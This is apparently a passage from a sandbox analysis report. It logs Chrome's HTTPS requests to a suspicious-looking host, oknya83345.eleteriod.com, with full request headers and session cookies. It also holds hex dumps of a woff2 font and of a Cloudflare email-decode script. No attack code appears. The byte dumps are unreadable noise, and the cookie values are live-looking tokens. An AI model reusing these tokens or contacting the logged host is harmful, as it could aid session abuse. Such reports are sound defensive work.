                          2024-05-22 15:57:24 UTC1369INData Raw: ec a7 d5 45 4c 1e ba 59 30 8f 71 e0 45 cd 17 36 9d d7 1b 32 2a 11 0d 58 a9 2e 71 1b 1f 61 c5 f5 94 ef d3 73 ea 88 7e fb b9 e6 e1 b6 70 c5 34 0a fa 3b 86 fc cc ba 3c 05 7c 34 ea 88 f5 a3 a2 c0 20 35 13 6c 15 e6 41 b8 3e b6 11 22 ac 69 58 6e 3e 6f 9f 28 7b a8 5f 8d bd 76 d8 eb 29 93 79 48 c9 a3 99 6f 6d 06 7f 5d 9e f1 6c 7c 55 3b 55 c9 af 3f cf 18 45 2c 1f 72 44 e3 8e 81 85 63 86 d5 6b ad b7 62 ee 7b 30 a5 df b6 73 24 1a c7 c1 b3 0d fe d9 73 ef 8f c3 b0 9d 51 f5 d7 70 ba 54 f4 24 dd 1a 73 5e 9d 9c 39 5d 1e 8c 82 fe 2c 1f ac a6 0c ba fc c5 27 14 94 19 0f 5f 43 a0 42 02 67 1f be 85 af e9 f8 fc a5 c4 0d b4 f6 ff a2 a2 95 1c ec dd 96 1c e3 1d 16 52 27 61 e2 78 29 ad 1d 7e c2 7e d3 02 91 a1 b6 1e d4 a0 32 62 5d 05 eb 60 2f a3 ce 28 2a e3 76 d1 e6 94 8a 9e 84 ca
                          Data Ascii: ELY0qE62*X.qas~p4;<|4 5lA>"iXn>o({_v)yHom]l|U;U?E,rDckb{0s$sQpT$s^9],'_CBgR'ax)~~2b]`/(*v
                          2024-05-22 15:57:24 UTC1369INData Raw: f9 89 93 e2 ee 78 43 e1 f8 8c 32 f2 52 b9 28 d4 a6 32 9a 40 88 66 46 b8 5f 12 ff ff f1 87 04 f0 10 a2 2a 99 3a 19 38 85 1e 76 b6 ca 97 a4 50 a1 74 c5 4a 64 28 d7 28 4b 8b 76 a5 ba f4 a8 34 64 58 ad 57 5e a9 37 61 5a 83 05 0b b0 56 ec 6a b1 ef 8d 6e 47 be ea 77 69 c1 73 7e 5b 36 e1 26 c8 81 08 6c e7 58 14 76 72 2e 2a 52 87 d1 0a 77 14 a7 68 9f bb 2f d5 97 1e 6b e9 a2 36 6d fd ae 5d 6f 7f 1a b0 82 9f bb 29 b7 d4 fd 91 ac f6 10 55 d6 d9 81 2f c0 08 b1 30 af 61 14 e9 1d cc 52 bc 9b 4d aa f7 6a 94 66 cc 30 31 cf 58 e7 eb 7d 07 9e e7 07 f4 ff dd 72 11 79 f7 17 5f 34 4c 30 6f 52 00 13 2c 5d 6a a1 96 01 ec 65 65 8c c9 a0 60 fb 80 e3 33 a2 57 29 00 94 cf 1c 2c af 0c ea d6 9e 38 04 86 2f cf 6a 38 67 ad fd e2 eb f5 49 f1 24 1f c0 fb 3c e2 91 ad 41 0a dd d8 dc da de
                          Data Ascii: xC2R(2@fF_*:8vPtJd((Kv4dXW^7aZVjnGwis~[6&lXvr.*Rwh/k6m]o)U/0aRMjf01X}ry_4L0oR,]jee`3W),8/j8gI$<A
                          2024-05-22 15:57:24 UTC1369INData Raw: 69 17 89 4a a3 f3 33 98 2c 41 21 b6 b0 88 47 91 d7 a4 a8 59 49 85 cd e8 3b 74 ea d2 ad 47 af 01 83 2a 50 d0 30 b0 86 e7 e1 2b 22 33 b7 92 8a 9a 86 56 b1 9b 6b ab d7 c0 f1 42 d4 c9 4c 7c 57 eb 35 6a d6 a2 4d 87 17 ba 74 eb d5 6f f0 25 a9 7f fd e7 cc 5b b0 68 c9 b2 15 ab d6 ac db b4 65 db 8e 5d 7b f6 1f 5c 46 ee 05 c1 f8 3a a8 e2 f4 ae 1d 96 85 be 31 95 e5 ba 29 b3 5a 43 66 ac 5d ff 03 0f b1 75 01 fc b2 4f 81 3a f6 64 4f 47 bb 09 e2 3c 29 42 ad e2 3e 22 4d c4 96 88 6b 74 7e fd 64 e0 75 81 12 2b 3a af dd 10 60 9b 79 6f a0 89 16 44 eb 3a 5f 22 ef c0 43 4c be cd 4a 39 0e c7 e5 59 da 0b 4e c2 cb e5 0c c1 50 23 94 b7 f3 4e de 25 4a c6 14 ad b2 60 08 6e 56 39 dc aa d3 6a 2d 0f 41 b9 5a df dc ee da de da be da fe 15 9d 13 bc 46 63 60 98 0d 8b 15 9c 87 cd 92 34 67
                          Data Ascii: iJ3,A!GYI;tG*P0+"3VkBL|W5jMto%[he]{\F:1)ZCf]uO:dOG<)B>"Mkt~du+:`yoD:_"CLJ9YNP#N%J`nV9j-AZFc`4g
                          2024-05-22 15:57:24 UTC1369INData Raw: 82 82 03 f3 57 85 84 d4 2b 00 1c 18 0f 5d 54 95 c8 98 28 93 32 63 a4 7d 4c 7f a8 5d 3c fc e6 0b 52 65 a8 96 ad 58 0e 9c 5d eb b6 6c 47 61 61 c3 76 2e 25 66 40 87 ee 2b 77 72 0b b9 36 71 8f ab 5f 1d 5b f5 cc bb 91 f0 45 30 3e 81 94 2f a3 d2 8e 56 37 3a 3d a8 75 61 30 8d d1 0c 4e 07 58 6c 60 b7 83 db 11 56 9b 78 3d f6 4d 93 ef f2 ae 35 07 29 06 c0 76 69 21 92 12 8b a1 27 35 49 2b 44 12 93 cf 48 71 b0 40 ca 43 53 1d 9e ca b0 90 23 52 1b 9b e6 94 b4 a7 a7 35 4d 21 2e 87 4c c3 aa 9a 97 c9 d2 f4 17 66 95 1f bf 28 5e 61 c2 ca 24 35 89 ab 13 55 a5 5c 9f 62 5d f2 f6 6c 6f 17 b8 23 ef de 82 df 2a 60 7b 41 6f 16 f1 7e 31 ad 15 2b a1 9d 92 db 2f b1 dd 08 f8 24 f1 58 b6 cd cf a7 2f 72 be 06 8f cf 43 45 27 ad 4d b5 a1 b3 3a 34 5b ca 51 91 0f 59 c2 86 19 45 7e 58 f8 7b
                          Data Ascii: W+]T(2c}L]<ReX]lGaav.%f@+wr6q_[E0>/V7:=ua0NXl`Vx=M5)vi!'5I+DHq@CS#R5M!.Lf(^a$5U\b]lo#*`{Ao~1+/$X/rCE'M:4[QYE~X{


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          36192.168.2.449777188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:23 UTC1407OUTGET /efNetwmIjcotbWexft46IfrD56NZXTOFWmn99 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://oknya83345.eleteriod.com
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: font
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:24 UTC632INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:24 GMT
                          Content-Type: font/woff2
                          Content-Length: 93276
                          Connection: close
                          Content-Disposition: inline; filename="efNetwmIjcotbWexft46IfrD56NZXTOFWmn99"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=juhZnPfNJBtCEBU9QmsSQBHo2VEE9UoMDxAPRi3UlaQX8JqVO7c433a%2BId3G83lGDGw7mR61CcV6ozi172t1RCkDpjOdYz2EoDfPdpe%2F%2FeqcyqxtmEHnBvA4Ul1foQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e006cac1141b2-EWR
                          2024-05-22 15:57:24 UTC737INData Raw: 77 4f 46 32 00 01 00 00 00 01 6c 5c 00 14 00 00 00 04 b2 20 00 01 6b e0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a a4 76 1b 83 bb 26 1c 93 24 3f 48 56 41 52 a0 6a 3f 4d 56 41 52 81 46 06 60 3f 53 54 41 54 81 36 27 38 00 91 18 2f 81 48 11 08 0a 81 f8 0c 81 d3 78 0b 89 1a 00 30 8b e7 3a 01 36 02 24 03 92 30 04 20 05 97 7a 07 a2 17 5b 12 9a 94 07 25 22 db df 13 ba a5 ab c1 a5 a2 a8 fe 21 df bb 49 da 54 19 b0 7f a9 77 90 21 63 9b 48 1d ce cd 74 1d 5d 6b a5 08 9e a7 0f c8 36 9d f1 82 43 79 c3 a8 7f 55 6c b7 72 65 ff ff ff ff ff ff 9b 92 49 8c e9 25 e8 25 f9 7f 00 15 44 45 b1 a0 ba ce 76 d3 69 ae 51 46 38 dc dd 84 83 d2 69 48 19 21 72 0a ca e2 f4 da d1 50 34 5a 5b b9 db ae 1d f6 5a 73 10 9e 89 b6 6f 06 0e 72 ef e2 38 62 1c 4f e8
                          Data Ascii: wOF2l\ kv&$?HVARj?MVARF`?STAT6'8/Hx0:6$0 z[%"!ITw!cHt]k6CyUlreI%%DEviQF8iH!rP4Z[Zsor8bO
                          2024-05-22 15:57:24 UTC1369INData Raw: 10 0f f1 f9 f3 34 67 bd 3f f3 47 f2 33 13 26 d3 99 30 4c 26 e9 24 85 40 52 36 bb a5 e2 88 55 8c 15 6f 9d dd 3a ed 9a 53 a7 3d 0a d4 1c b3 db 62 55 0b a1 75 ca 5d 7a ac 57 38 5b 55 18 7c 37 fb 27 fe 25 e6 f2 75 2e 9c 88 31 31 8e 19 67 3c c6 ba 5e c7 a0 eb fa 4a c9 da 50 42 1b 4a 48 42 02 11 f0 6b fa b3 0f 0e 89 0a 91 8a 5d c4 80 28 24 a5 0d 44 ae 16 ab 53 22 75 be b7 ce 37 e2 fc ab 39 9f 38 15 a3 ee d4 9c 1a 55 a3 e6 37 13 d4 a6 ed 52 24 04 df 78 a9 f9 ac 67 d0 58 9b 7a 56 81 2c a8 24 a5 19 ab 89 79 c6 3a 8e 8d 8a 88 86 51 24 4f 4d c7 b1 f6 b7 9f 71 cc e7 20 a3 88 08 28 df 96 4f e5 14 c4 00 22 12 64 3c 07 6c c8 ed 39 a9 fd 7c 5e 42 08 72 b6 35 8f d0 c3 f3 a7 fd cc b9 79 69 bb 44 99 0f b9 5f 84 16 09 3c 50 9b f9 6f 92 11 08 a9 28 52 65 ab 49 eb 90 c9 96 9a
                          Data Ascii: 4g?G3&0L&$@R6Uo:S=bUu]zW8[U|7'%u.11g<^JPBJHBk]($DS"u798U7R$xgXzV,$y:Q$OMq (O"d<l9|^Br5yiD_<Po(ReI
                          2024-05-22 15:57:24 UTC1369INData Raw: 8e 0c 63 96 10 1c 40 42 44 dd f4 16 cf 30 00 2b fb 79 0b 30 ab c4 72 0d 2d 40 8d fe 19 13 b5 2f 74 e2 3e 24 50 23 ab dc 2a 66 4d 64 c4 fc ff 2f 53 ab 6d 24 50 26 09 49 5d 09 75 9d 3e c1 ea 31 1f d2 98 cf 56 cd 54 a8 74 6a 7f 21 1b e3 9c 0f 44 44 22 1d 29 45 26 48 55 24 92 52 07 92 54 55 20 21 75 7d 24 c8 3a 01 40 86 24 32 00 8a cd 24 e5 2d 59 9e 72 a6 cc 4b 24 d5 13 80 aa 7a 82 60 1b 94 34 ce 2d 67 b1 1c ca 96 d5 9c 33 32 e3 a4 1a e3 36 db 24 c7 b1 8d db a9 6a 45 cd 8a 9a 55 8a e3 a8 9a fd 86 aa 55 d5 ac d4 1a bf 33 7e d7 67 f8 e7 6d 4f ce f6 e5 66 e3 7f 46 56 c8 0a 61 36 e5 a3 4e 26 1e 46 a2 08 72 83 40 08 87 47 e1 7f 99 5a a6 68 7c 99 6e 6c d2 0f 2b 33 dc e8 4e 91 71 44 5d 90 6c 29 8d ba 7f af 41 f7 5b 43 0e ce 0d 46 16 90 e1 0e ce 11 23 c7 5d f9 38 5a
                          Data Ascii: c@BD0+y0r-@/t>$P#*fMd/Sm$P&I]u>1VTtj!DD")E&HU$RTU !u}$:@$2$-YrK$z`4-g326$jEUU3~gmOfFVa6N&Fr@GZh|nl+3NqD]l)A[CF#]8Z
                          2024-05-22 15:57:24 UTC1369INData Raw: e1 43 b4 b6 e2 5b 28 0a 7e 3f b8 60 01 41 a5 a2 9d 5f aa aa 92 e7 97 9e 00 03 7a 83 f2 df f4 f1 96 7c fe b4 e4 ea d5 9a f9 6c b0 ba 4a 10 6f b7 59 2c ed 74 74 e4 f7 a7 d3 2b 96 40 40 51 66 f5 e7 a0 33 8f 73 f2 d6 c3 e5 9d c3 71 fc 46 72 66 3c 24 2e ce 60 06 3a c8 29 d6 a8 8f 62 ff a8 a5 b5 cd eb 44 76 4b 25 94 fc d0 62 76 e3 42 5d fd 97 64 4c 8b a5 52 6f f8 db 8f 00 94 fc c8 46 5c bd 1c c3 40 2b d1 7a 43 c4 ad 17 b2 b7 ee 9b 4d 09 0d f9 6d 07 99 10 1d 47 e6 96 3a 20 3d bc 3a 0d 3e bf 95 84 ea 25 93 ae 69 08 6c df 80 35 2a 08 70 c7 de 92 9c 79 e0 1a 17 e6 d0 2b 30 1e 2f 83 0e c7 e9 73 30 77 e7 e6 02 22 bb d8 06 99 5b ee 22 53 80 20 c8 6e 2c 06 05 26 12 28 14 52 ba 16 12 3d a2 47 3f 10 f5 06 a5 24 4d 82 75 e6 ad 90 27 62 69 e9 36 4c 84 88 93 25 f6 f6 23 80
                          Data Ascii: C[(~?`A_z|lJoY,tt+@@Qf3sqFrf<$.`:)bDvK%bvB]dLRoF\@+zCMmG: =:>%il5*py+0/s0w"["S n,&(R=G?$Mu'bi6L%#
                          2024-05-22 15:57:24 UTC1369INData Raw: 54 e7 d6 9d 2d b4 a6 93 cf 99 1f a7 dd 6e 68 53 44 dd 65 65 89 d1 c0 a3 92 64 cc 31 18 63 26 13 31 4e cf 58 79 53 b2 2e db 9a 28 b6 9b 3c a6 00 5c 5e 11 8b 83 4b be 05 32 16 f2 27 f7 9c df b0 9c 1c 87 3a fa 62 03 4e 5f dc 30 32 d9 0e 2d 29 bb 39 86 5a ea 25 1c f9 80 80 d3 b0 59 47 03 e1 38 0e 99 e4 42 e4 67 ce e4 d4 da 88 c7 03 50 4c 29 22 8c 02 70 3a 8b 8a 3b 0f 04 48 26 b5 d1 e4 52 e7 01 3b 4a af d0 d3 a7 68 fe d1 72 c3 4a 60 ba 24 bf 8f 51 eb 11 25 b1 c6 4b 41 a6 d8 73 32 1b 16 4b c4 62 8e e3 36 ec 6e b3 cd 37 b4 0e 4b 95 68 ab 33 1a 0d ac 6a 2b cd a4 45 22 f2 62 82 62 42 1d c3 cc f9 59 5f 50 eb 07 b4 8a da 4d aa 17 47 d3 fa a5 80 8d 11 25 a5 a5 8e 5b 88 5c b9 82 21 5e 88 6c 18 63 03 d6 93 18 f3 cb 40 59 d9 d2 20 37 88 18 e8 62 0c ab b3 f8 99 33 4f d5
                          Data Ascii: T-nhSDeed1c&1NXyS.(<\^K2':bN_02-)9Z%YG8BgPL)"p:;H&R;JhrJ`$Q%KAs2Kb6n7Kh3j+E"bbBY_PMG%[\!^lc@Y 7b3O
                          2024-05-22 15:57:24 UTC1369INData Raw: 9f 82 2c b7 fc 55 50 9b 51 70 75 a8 cf 20 94 27 85 0a 16 c2 d5 50 55 97 db 1a cc e4 ea f8 bf 7f 82 9d cf b0 bf bf a8 d2 cf 05 72 5b e8 50 23 0f 23 4b 61 90 94 da f0 4d c9 51 9e 26 0a ec ec ab 69 b4 bd c3 2f 0a f0 74 03 f6 16 2e 59 39 12 0b bc 0c 0d 75 a9 8f 01 48 d7 04 85 96 d2 ab 02 9b de 6d db bd 90 bc 86 ef 83 5a 63 5b 32 e2 71 f8 6e c1 87 75 a9 ee 4c f7 99 27 02 3c 78 27 d8 98 de f7 56 7f 6e f1 fc aa 81 eb 24 c5 fb 60 e0 b0 f2 f0 af dd 25 60 5f 6c d7 6b c0 60 ea 09 fc a1 7e ef 21 d2 65 be 87 84 64 f1 c8 69 fa 9c 49 2f cf 79 79 88 42 e1 4d be 7d 02 60 bf 63 b8 ea ea 63 24 2b 5c 48 cf ca 79 d8 58 89 bd 6f 81 38 cf 87 07 47 13 25 b0 2d d0 2c 71 94 b6 07 95 04 aa e5 65 bc fd e1 eb 93 81 1b a5 d7 ee 19 35 2a 5a aa 17 d4 e1 0e 65 4b 21 2d a7 bf d7 25 e2 9e
                          Data Ascii: ,UPQpu 'PUr[P##KaMQ&i/t.Y9uHmZc[2qnuL'<x'Vn$`%`_lk`~!ediI/yyBM}`cc$+\HyXo8G%-,qe5*ZeK!-%
                          2024-05-22 15:57:24 UTC1369INData Raw: 9a 90 a7 8b 89 35 60 8b 3c b7 b7 76 cf d3 be da d0 82 50 1b dc 81 52 9f 2b 78 b5 85 1a db 2f 23 11 ee 7e 0f 9c d7 f5 b8 cb 06 d1 4f 79 55 8a 13 9b 6a a8 95 46 95 37 af 7b 7d 90 cb 24 1d 9e 26 31 5b 76 a7 8e 76 62 74 7b e0 dc a7 f1 6e 9f 45 d5 21 b2 23 85 2c cb e7 31 09 a3 7a 4c d0 45 20 b1 44 fe 05 66 c7 02 03 dc df d5 bb 25 f4 ec 02 f0 c1 23 0b fa 7f ae 9b 73 07 7b 16 f5 36 ec ec 00 db ec 7f d4 4b 78 3e 73 73 9f 0a ae ec e5 80 c4 cf 0a 3d 62 99 08 c1 b2 7d c7 70 b5 8c c7 69 52 40 79 3c 9f b9 99 d4 52 6e df 0a 35 b9 f0 ac 83 b5 6c 74 9e b8 70 fd 1d b6 ee 75 41 04 b5 ad 5c 10 e6 ad df 53 fe 59 1e 0a 54 02 09 f8 5e ab e5 8c c5 72 4c 47 c6 3b 62 55 95 51 f0 eb 4f 75 3e 57 a6 36 98 bc fe b1 bc ff 61 18 a2 79 e6 01 b9 02 66 9e 81 b8 b7 6b 51 78 30 95 72 f9 41
                          Data Ascii: 5`<vPR+x/#~OyUjF7{}$&1[vvbt{nE!#,1zLE Df%#s{6Kx>ss=b}piR@y<Rn5ltpuA\SYT^rLG;bUQOu>W6ayfkQx0rA
                          2024-05-22 15:57:24 UTC1369INData Raw: 62 10 69 58 16 18 ff 45 1e a2 6d 55 84 60 bb 94 83 f1 a5 aa 10 eb 80 6a 04 ba dd 16 24 bb cb 76 94 bb db 0e 54 fa b4 dd 28 f7 19 9d a8 f4 59 7b 91 ec f3 f6 a1 d0 17 ec 47 b1 2f ea 42 a1 2f 39 80 62 df 74 12 bc df 77 06 bc 3f 73 01 b9 7e ee 71 e4 fb bb 2d ec ef 7f d2 19 f5 41 7b 18 ef 31 87 58 ef 21 27 d1 79 d4 69 74 9e 74 8d 23 23 9b 2c 50 b6 a6 80 27 3b 52 c2 93 d9 40 c0 e7 aa a0 90 01 f3 29 68 ec d8 71 e2 04 83 80 00 e3 c2 05 82 1b 37 71 1e 3c 50 15 2c 96 c1 03 90 05 75 49 6e 2d 19 e1 95 12 4e d0 eb 09 a1 25 6a 42 ad 00 59 26 63 cf 71 3e 9d 2c 30 95 67 c9 12 c6 10 a1 01 97 41 48 16 7e 72 c0 e5 e1 a3 00 5c 91 be b5 13 b4 60 8d 50 60 16 62 8c 23 2c 93 87 41 a6 b8 c0 32 1b d9 cc f1 84 5d ca eb c5 8d 70 d0 ac bc 4b 85 93 72 39 40 ae f8 bc 94 2b 97 55 20 79
                          Data Ascii: biXEmU`j$vT(Y{G/B/9btw?s~q-A{1X!'yitt##,P';R@)hq7q<P,uIn-N%jBY&cq>,0gAH~r\`P`b#,A2]pKr9@+U y
                          2024-05-22 15:57:24 UTC1369INData Raw: 41 79 a5 b8 da 6d 00 aa 75 3c 04 9b 2b 02 72 61 45 50 0c 27 48 8a 66 58 8e 17 c4 72 ff 0a aa a6 1b a6 65 03 00 88 b0 24 13 ca b8 50 54 ad 3e b1 db 03 04 84 eb 88 80 62 38 41 52 34 c3 72 bc 20 96 b6 51 46 51 6b 9b a9 63 98 56 a3 e2 13 15 c2 04 21 e9 30 60 05 83 86 c4 8f e9 a0 a9 ff f0 17 a0 b7 17 e7 07 65 da fd 98 7e d8 04 c0 0d b5 75 78 ca 39 2a af 15 ac 6d 98 37 9c 46 60 a4 51 46 1b 63 ac 64 29 52 a5 49 97 21 53 56 45 1d 2a 36 25 95 a2 4c b9 8a 2a 47 ac 4a 54 ab 51 5b dd e8 d5 a3 41 e3 73 28 bc 75 10 b4 db 41 a5 28 53 8e 1e d2 f3 3a cc bc 1d 7c fc 10 25 da bd f2 fc a6 e8 16 82 4b 39 b0 71 4d 28 28 c1 54 d4 34 0d d5 a6 e7 9b d7 02 78 db f5 6f 2c 5c 2e 36 76 cf fe a6 f4 a5 10 31 09 09 d0 9e 36 f0 1f 3e 12 3b 49 4b 4b 4b 4b 4b bf cf 6e e5 eb f8 ee 58 bb 05
                          Data Ascii: Aymu<+raEP'HfXre$PT>b8AR4r QFQkcV!0`e~ux9*m7F`QFcd)RI!SVE*6%L*GJTQ[As(uA(S:|%K9qM((T4xo,\.6v16>;IKKKKKnX
                          2024-05-22 15:57:24 UTC1369INData Raw: 51 a2 c5 d8 27 43 26 02 22 92 13 20 64 14 59 b2 e5 a0 3a 99 67 82 e6 ee 72 cf 1d 66 c7 a3 2c 1a da 79 0f 13 14 29 92 e2 71 c9 44 e4 e7 84 a0 c2 9f f7 0e ba a8 11 61 68 5f fa 1d ff f6 b8 d7 09 45 9d f7 18 61 a2 cf d1 a7 76 8f 13 7e b0 51 c5 d3 5b 09 40 57 2c 6f 6b b6 61 22 ea 37 fd 68 16 80 a1 c0 35 c2 0c d2 3a 85 ef 21 50 78 14 9f 15 27 6e bd a6 4d 6a 70 82 bc 56 5c ed c3 07 4f fc db 7e b8 f3 ce 26 a0 dc bc 05 0a 43 71 81 c0 11 41 31 9c 20 29 9a 61 39 5e 10 3b a3 77 e9 b5 a7 54 3d eb 39 f8 84 11 13 21 91 29 54 1a 9d c1 64 b1 39 5c 5e fe 82 0a 00 c0 d0 b2 c2 20 28 56 b8 c4 22 c4 92 8f 4b c4 db e9 d5 16 77 f3 73 34 90 cb 61 6b a5 67 b8 d1 63 dc 12 db 49 a1 78 8f 3a 70 56 78 9c f7 22 15 6d 55 d4 d2 cd 70 8f 4e b6 dd 48 9f a8 82 3e b4 c1 8c 26 b3 25 20 c1 88
                          Data Ascii: Q'C&" dY:grf,y)qDah_Eav~Q[@W,oka"7h5:!Px'nMjpV\O~&CqA1 )a9^;wT=9!)Td9\^ (V"Kws4akgcIx:pVx"mUpNH>&%


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          37192.168.2.449780188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:23 UTC1395OUTGET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:23 UTC758INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:23 GMT
                          Content-Type: application/javascript
                          Content-Length: 1239
                          Connection: close
                          Last-Modified: Mon, 20 May 2024 10:29:22 GMT
                          ETag: "664b2602-4d7"
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ws2fmKrTe3kXonKE8%2B70Oo33FshqaZctoklzxFZtKgXY4UmENoRCDpPPxJLpzlRg3xEedZvbzpsW5FOdeBXkCFFShtxmQ4bEsmU3NovgziseInYPqnnYUMMx0Uu7HVFv5In1gc2JAInYB9k%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 887e006e58ac78e2-EWR
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          Expires: Fri, 24 May 2024 15:57:23 GMT
                          Cache-Control: max-age=172800
                          Cache-Control: public
                          Accept-Ranges: bytes
                          2024-05-22 15:57:23 UTC611INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 74 72 79 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 29 72 65 74 75 72 6e 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 3f 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 61 20 68 72 65 66 3d 22 27 2b 65 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2b 27 22 3e 3c 2f 61 3e 27 2c 64 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66
                          Data Ascii: !function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href
